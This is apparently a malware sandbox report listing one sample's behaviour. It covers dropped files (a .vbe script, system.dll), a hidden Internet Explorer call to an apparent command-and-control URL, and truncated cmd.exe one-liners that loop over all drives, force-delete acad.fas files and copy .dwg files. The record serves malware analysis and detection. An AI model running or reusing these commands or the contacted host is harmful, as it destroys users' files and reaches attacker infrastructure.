Technical Information
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://fwwdym.2288.org/micscgx.asp
- %TEMP%\current.tmp
- %TEMP%\nse3949.tmp\system.dll
- C:\getmodulefilenameaas.vbe
- %TEMP%\nse3949.tmp\system.dll
- C:\getmodulefilenameaas.vbe
- DNS ASK fw###m.2288.org
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "C:\GetModuleFileNameAas.vbe"
- '%WINDIR%\syswow64\cmd.exe' /c @echo off&setlocal enabledelayedexpansion&(for %d in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (if exist %d: cd /d %d:\&del /f /q /s /A-S acad.fas>nul&(if exist %d:\\*.dwg copy /y...
- '%WINDIR%\syswow64\cmd.exe' /c dir /s /b /a:d C:\
- '%WINDIR%\syswow64\cmd.exe' /c @echo off&setlocal enabledelayedexpansion&(for %d in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (if exist %d: cd /d %d:\&del /f /q /s /A-S acad.fas>nul&(if exist %d:\\*.dwg copy /y...' (with hidden window)
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://fwwdym.2288.org/micscgx.asp' (with hidden window)